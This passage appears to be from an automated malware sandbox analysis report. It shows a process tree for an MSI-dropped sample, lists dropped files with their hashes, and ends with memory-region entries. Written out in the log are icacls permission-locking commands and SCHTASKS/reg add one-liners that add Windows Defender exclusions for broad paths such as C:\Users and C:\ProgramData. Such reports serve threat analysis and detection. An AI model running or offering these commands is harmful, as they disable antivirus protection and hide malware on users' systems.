                                          3⤵
                                          • Executes a command shell one-liner
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious use of WriteProcessMemory
                                          PID:3024
                                          • C:\Windows\SysWOW64\icacls.exe
                                            icacls "C:\Program Files (x86)\qmaocS\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                            4⤵
                                            • Possible privilege escalation attempt
                                            • Modifies file permissions
                                            • System Location Discovery: System Language Discovery
                                            PID:4880
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c icacls "C:\Program Files (x86)\qmaocS\thumbs.db" /inheritance:r
                                          3⤵
                                          • Executes a command shell one-liner
                                          • Suspicious use of WriteProcessMemory
                                          PID:4504
                                          • C:\Windows\SysWOW64\icacls.exe
                                            icacls "C:\Program Files (x86)\qmaocS\thumbs.db" /inheritance:r
                                            4⤵
                                            • Possible privilege escalation attempt
                                            • Modifies file permissions
                                            • System Location Discovery: System Language Discovery
                                            PID:4308
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c icacls "C:\Program Files (x86)\qmaocS\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                          3⤵
                                          • Executes a command shell one-liner
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious use of WriteProcessMemory
                                          PID:3856
                                          • C:\Windows\SysWOW64\icacls.exe
                                            icacls "C:\Program Files (x86)\qmaocS\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                            4⤵
                                            • Possible privilege escalation attempt
                                            • Modifies file permissions
                                            PID:3504
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c icacls "C:\Program Files (x86)\qmaocS\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                          3⤵
                                          • Executes a command shell one-liner
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious use of WriteProcessMemory
                                          PID:5004
                                          • C:\Windows\SysWOW64\icacls.exe
                                            icacls "C:\Program Files (x86)\qmaocS\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                            4⤵
                                            • Possible privilege escalation attempt
                                            • Modifies file permissions
                                            PID:4620
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c icacls "C:\Program Files (x86)\qmaocS\XPSPLOG.dll" /inheritance:r
                                          3⤵
                                          • Executes a command shell one-liner
                                          PID:2764
                                          • C:\Windows\SysWOW64\icacls.exe
                                            icacls "C:\Program Files (x86)\qmaocS\XPSPLOG.dll" /inheritance:r
                                            4⤵
                                            • Possible privilege escalation attempt
                                            • Modifies file permissions
                                            • System Location Discovery: System Language Discovery
                                            PID:2204
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c icacls "C:\Program Files (x86)\qmaocS\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                          3⤵
                                          • Executes a command shell one-liner
                                          • System Location Discovery: System Language Discovery
                                          PID:2932
                                          • C:\Windows\SysWOW64\icacls.exe
                                            icacls "C:\Program Files (x86)\qmaocS\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                            4⤵
                                            • Possible privilege escalation attempt
                                            • Modifies file permissions
                                            • System Location Discovery: System Language Discovery
                                            PID:4392
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c icacls "C:\Program Files (x86)\qmaocS\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                          3⤵
                                          • Executes a command shell one-liner
                                          • System Location Discovery: System Language Discovery
                                          PID:1880
                                          • C:\Windows\SysWOW64\icacls.exe
                                            icacls "C:\Program Files (x86)\qmaocS\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                            4⤵
                                            • Possible privilege escalation attempt
                                            • Modifies file permissions
                                            PID:2776
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                          3⤵
                                          • Indicator Removal: Clear Persistence
                                          • System Location Discovery: System Language Discovery
                                          PID:212
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:4744
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            SCHTASKS /Run /TN "Task1"
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:4396
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            SCHTASKS /Delete /TN "Task1" /F
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:4368
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                          3⤵
                                          • Indicator Removal: Clear Persistence
                                          • System Location Discovery: System Language Discovery
                                          PID:3348
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:3504
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            SCHTASKS /Run /TN "Task1"
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:4620
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            SCHTASKS /Delete /TN "Task1" /F
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:4636
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\b1AX5n" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      • Suspicious use of WriteProcessMemory
                                      PID:4740
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\b1AX5n" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:412
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe
                                      1⤵
                                        PID:4872
                                      • C:\Windows\system32\cmd.exe
                                        cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                        1⤵
                                        • Executes a command shell one-liner
                                        • Suspicious use of WriteProcessMemory
                                        PID:4100
                                        • C:\Windows\system32\reg.exe
                                          reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                          2⤵
                                          • Windows security bypass
                                          PID:4484
                                      • C:\Windows\system32\cmd.exe
                                        cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                        1⤵
                                        • Executes a command shell one-liner
                                        • Suspicious use of WriteProcessMemory
                                        PID:928
                                        • C:\Windows\system32\reg.exe
                                          reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                          2⤵
                                          • Windows security bypass
                                          PID:228
                                      • C:\Windows\system32\cmd.exe
                                        cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                        1⤵
                                        • Executes a command shell one-liner
                                        • Suspicious use of WriteProcessMemory
                                        PID:3768
                                        • C:\Windows\system32\reg.exe
                                          reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                          2⤵
                                          • Windows security bypass
                                          PID:4492
                                      • C:\Windows\system32\cmd.exe
                                        cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                        1⤵
                                        • Executes a command shell one-liner
                                        • Suspicious use of WriteProcessMemory
                                        PID:4672
                                        • C:\Windows\system32\reg.exe
                                          reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                          2⤵
                                          • Windows security bypass
                                          PID:824
                                      • C:\Program Files (x86)\qmaocS\qmaocS.exe
                                        "C:\Program Files (x86)\qmaocS\qmaocS.exe"
                                        1⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • System Location Discovery: System Language Discovery
                                        PID:4852
                                      • C:\Program Files (x86)\qmaocS\qmaocS.exe
                                        "C:\Program Files (x86)\qmaocS\qmaocS.exe"
                                        1⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • System Location Discovery: System Language Discovery
                                        PID:3940
                                      • C:\Program Files (x86)\CEpl2\3e5K3R.exe
                                        "C:\Program Files (x86)\CEpl2\3e5K3R.exe"
                                        1⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • System Location Discovery: System Language Discovery
                                        PID:3488
                                      • C:\Windows\system32\cmd.exe
                                        cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)\qmaocS" /t REG_DWORD /d 0 /f
                                        1⤵
                                        • Executes a command shell one-liner
                                        PID:4528
                                        • C:\Windows\system32\reg.exe
                                          reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)\qmaocS" /t REG_DWORD /d 0 /f
                                          2⤵
                                          • Windows security bypass
                                          PID:1676
                                      • C:\Windows\system32\cmd.exe
                                        cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                        1⤵
                                        • Executes a command shell one-liner
                                        PID:3864
                                        • C:\Windows\system32\reg.exe
                                          reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                          2⤵
                                          • Windows security bypass
                                          PID:4392

                                      Network

                                            MITRE ATT&CK Enterprise v16

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            e583c3a.rbs

                                            • Path C:\Config.Msi\e583c3a.rbs
                                            • Size 7KB
                                            • SHA256 09c123d54aebb6ee0fc75231cdfbc1994c82599e3211a282789d6a309a33eb2e
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            XPSPLOG.dll

                                            • Path C:\Program Files (x86)\CEpl2\XPSPLOG.dll
                                            • Size 4.6MB
                                            • SHA256 f6c40b98404180651ef969efb537790bb897390329fa5b8b99e0b04d18b709d8
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            image.png

                                            • Path C:\Program Files (x86)\CEpl2\image.png
                                            • Size 4.9MB
                                            • SHA256 9aade0f3e717a9ca1a22b0f2b6ac4a6f7c5e28cdd1000dd9a23ec32fee066816
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            XPSPLOG.dll

                                            • Path C:\Program Files (x86)\qmaocS\XPSPLOG.dll
                                            • Size 4.6MB
                                            • SHA256 88d124dc83ba9618607b582887a272d9a7e85157d47ac38f33f656a27ac0e7d4
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            image.png

                                            • Path C:\Program Files (x86)\qmaocS\image.png
                                            • Size 4.9MB
                                            • SHA256 04220b1a62ad5cca3f715fc5bd4caf974106a28e294dfecacd90b3b052a4a3f6
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            qmaocS.exe

                                            • Path C:\Program Files (x86)\qmaocS\qmaocS.exe
                                            • Size 145KB
                                            • SHA256 6d6ba2bc9ad414837826f7278bc3e0116f1aeda02d0c2284ed65819f5d9180a8
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            thumbs.db

                                            • Path C:\Program Files (x86)\qmaocS\thumbs.db
                                            • Size 358KB
                                            • SHA256 b83fe2150398fe5b5d482ec411d58e7f51212aeaad19073047696a1d3cdfd341
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            __PSScriptPolicyTest_k00n42kf.kws.ps1

                                            • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k00n42kf.kws.ps1
                                            • Size 60B
                                            • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
                                            • MD5 SHA1 SHA512 TLSH

                                            destopbak.ini

                                            • Path C:\Users\Public\Music\destopbak.ini
                                            • Size 2B
                                            • SHA256 dd1e2826c0124a6d4f7397a5a71f633928926c0608b62fb9e615ba778acc39ff
                                            • MD5 SHA1 SHA512

                                            UxEnhance64.dll

                                            • Path C:\Users\Public\b1AX5n\UxEnhance64.dll
                                            • Size 3.1MB
                                            • SHA256 46d7a0f184da7f320323a5df3115741bd8b773024ed7049199c518901694bd7d
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            adoresd.dat

                                            • Path C:\Users\Public\b1AX5n\adoresd.dat
                                            • Size 4.8MB
                                            • SHA256 cee389067f2f4096b4057608b68cc75b31dbec05fbc629abae518c0908a5fc9f
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            jZZFxQ.exe

                                            • Path C:\Users\Public\b1AX5n\jZZFxQ.exe
                                            • Size 135KB
                                            • SHA256 676a2a7b94ca2f8ec76352ee656e4d075bb342bd7ad6efbc7c19c060001eace7
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            msadox.tb

                                            • Path C:\Users\Public\b1AX5n\msadox.tb
                                            • Size 8KB
                                            • SHA256 635cfe4e1ae6556353b8e2464669b8f4a1733d5da046d999e4f1aa04dbd7c4d0
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            MSI3DE0.tmp

                                            • Path C:\Windows\Installer\MSI3DE0.tmp
                                            • Size 7.7MB
                                            • SHA256 548be4f8ddff78dd8f6cc3efedf375adafc431a7ba27e47ce6f03a7e77e61bd1
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            e583c39.msi

                                            • Path C:\Windows\Installer\e583c39.msi
                                            • Size 7.7MB
                                            • SHA256 627c53c6769a9b4760cf8c4b739eddb213eb5ab50f4e8fae89a8d1261721c285
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            metadata-2

                                            • Path \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                                            • Size 24.1MB
                                            • SHA256 65bfb39ea1bb9bb8b04de521c64347a9bf59b7b578d986b378bd2090e5486cae
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            {a81a81ec-0b18-4aea-95e0-2e93f26886e3}_OnDiskSnapshotProp

                                            • Path \??\Volume{20c84cf9-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{a81a81ec-0b18-4aea-95e0-2e93f26886e3}_OnDiskSnapshotProp
                                            • Size 6KB
                                            • SHA256 da08c0317c871b5ae570fba02ff556ce0230d2e787929f9f7a64bdf6f1e72450
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            memory/2840-64-0x000002116BFA0000-0x000002116C85E000-memory.dmp

                                            memory/2840-68-0x000002116BFA0000-0x000002116C85E000-memory.dmp

                                            memory/2840-71-0x000002116BFA0000-0x000002116C85E000-memory.dmp

                                            memory/2840-70-0x000002116BFA0000-0x000002116C85E000-memory.dmp

                                            memory/2840-69-0x000002116BFA0000-0x000002116C85E000-memory.dmp

                                            memory/2840-75-0x000002116BFA0000-0x000002116C85E000-memory.dmp

                                            memory/2840-84-0x000002116CC30000-0x000002116CCBA000-memory.dmp

                                            memory/2840-83-0x000002116CC30000-0x000002116CCBA000-memory.dmp

                                            memory/2840-82-0x000002116CC30000-0x000002116CCBA000-memory.dmp

                                            memory/2840-81-0x000002116CC30000-0x000002116CCBA000-memory.dmp

                                            memory/2840-90-0x000002116BFA0000-0x000002116C85E000-memory.dmp

                                            memory/2840-88-0x000002116BFA0000-0x000002116C85E000-memory.dmp

                                            memory/2840-80-0x000002116B4F0000-0x000002116B53E000-memory.dmp

                                            memory/2840-63-0x00007FFA5D640000-0x00007FFA5D642000-memory.dmp

                                            memory/2840-55-0x00007FFA5D630000-0x00007FFA5D632000-memory.dmp

                                            memory/2840-56-0x00007FFA3E6A0000-0x00007FFA3EBBE000-memory.dmp

                                            memory/2840-61-0x000002116BFA0000-0x000002116C85E000-memory.dmp

                                            memory/3440-197-0x00000000038C0000-0x00000000040A9000-memory.dmp

                                            memory/3440-201-0x0000000010000000-0x0000000010061000-memory.dmp

                                            memory/3440-184-0x0000000001180000-0x0000000001181000-memory.dmp

                                            memory/3440-178-0x0000000074600000-0x0000000074D4A000-memory.dmp

                                            memory/3440-186-0x00000000038C0000-0x00000000040A9000-memory.dmp

                                            memory/3440-189-0x00000000038C0000-0x00000000040A9000-memory.dmp

                                            memory/3440-196-0x0000000002DA0000-0x0000000002DB4000-memory.dmp

                                            memory/3440-177-0x0000000001150000-0x0000000001151000-memory.dmp

                                            memory/3440-273-0x00000000038C0000-0x00000000040A9000-memory.dmp

                                            memory/3440-182-0x00000000038C0000-0x00000000040A9000-memory.dmp

                                            memory/3440-226-0x00000000038C0000-0x00000000040A9000-memory.dmp

                                            memory/3440-229-0x00000000038C0000-0x00000000040A9000-memory.dmp

                                            memory/3488-274-0x00000000014B0000-0x00000000014B1000-memory.dmp

                                            memory/3488-271-0x0000000003C30000-0x0000000004419000-memory.dmp

                                            memory/3488-253-0x0000000003C30000-0x0000000004419000-memory.dmp

                                            memory/3488-269-0x00000000014D0000-0x00000000014D1000-memory.dmp

                                            memory/3488-248-0x00000000014B0000-0x00000000014B1000-memory.dmp

                                            memory/3488-249-0x0000000072310000-0x0000000072A5A000-memory.dmp

                                            memory/3700-12-0x00007FFA5D630000-0x00007FFA5D632000-memory.dmp

                                            memory/3700-13-0x00007FFA3F020000-0x00007FFA3F679000-memory.dmp

                                            memory/3700-16-0x00007FFA49860000-0x00007FFA49870000-memory.dmp

                                            memory/3700-38-0x00007FFA49860000-0x00007FFA49870000-memory.dmp

                                            memory/3940-239-0x00000000007A0000-0x00000000007A1000-memory.dmp

                                            memory/3940-246-0x0000000003160000-0x0000000003949000-memory.dmp

                                            memory/3940-268-0x00000000007A0000-0x00000000007A1000-memory.dmp

                                            memory/3940-265-0x0000000003160000-0x0000000003949000-memory.dmp

                                            memory/3940-240-0x0000000074600000-0x0000000074D4A000-memory.dmp

                                            memory/3940-264-0x0000000000B70000-0x0000000000B71000-memory.dmp

                                            memory/4852-255-0x0000000002560000-0x0000000002561000-memory.dmp

                                            memory/4852-262-0x0000000000CE0000-0x0000000000CE1000-memory.dmp

                                            memory/4852-257-0x00000000030A0000-0x0000000003889000-memory.dmp

                                            memory/4852-234-0x0000000000CE0000-0x0000000000CE1000-memory.dmp

                                            memory/4852-243-0x00000000030A0000-0x0000000003889000-memory.dmp

                                            memory/4852-235-0x0000000074600000-0x0000000074D4A000-memory.dmp

                                            memory/4984-278-0x0000000004CE0000-0x0000000005308000-memory.dmp

                                            memory/4984-293-0x000000006E900000-0x000000006E94C000-memory.dmp

                                            memory/4984-281-0x0000000005580000-0x00000000055E6000-memory.dmp

                                            memory/4984-280-0x00000000053E0000-0x0000000005446000-memory.dmp

                                            memory/4984-287-0x00000000055F0000-0x0000000005944000-memory.dmp

                                            memory/4984-277-0x0000000004640000-0x0000000004676000-memory.dmp

                                            memory/4984-290-0x0000000005BF0000-0x0000000005C0E000-memory.dmp

                                            memory/4984-291-0x0000000005C20000-0x0000000005C6C000-memory.dmp

                                            memory/4984-292-0x00000000061B0000-0x00000000061E2000-memory.dmp

                                            memory/4984-279-0x0000000005340000-0x0000000005362000-memory.dmp

                                            memory/4984-301-0x0000000006190000-0x00000000061AE000-memory.dmp

                                            memory/4984-302-0x0000000006BB0000-0x0000000006C53000-memory.dmp

                                            memory/4984-303-0x0000000007550000-0x0000000007BCA000-memory.dmp

                                            memory/4984-304-0x0000000006F00000-0x0000000006F1A000-memory.dmp

                                            memory/4984-305-0x0000000006F70000-0x0000000006F7A000-memory.dmp

                                            memory/4984-306-0x0000000007180000-0x0000000007216000-memory.dmp

                                            memory/4984-307-0x0000000007100000-0x0000000007111000-memory.dmp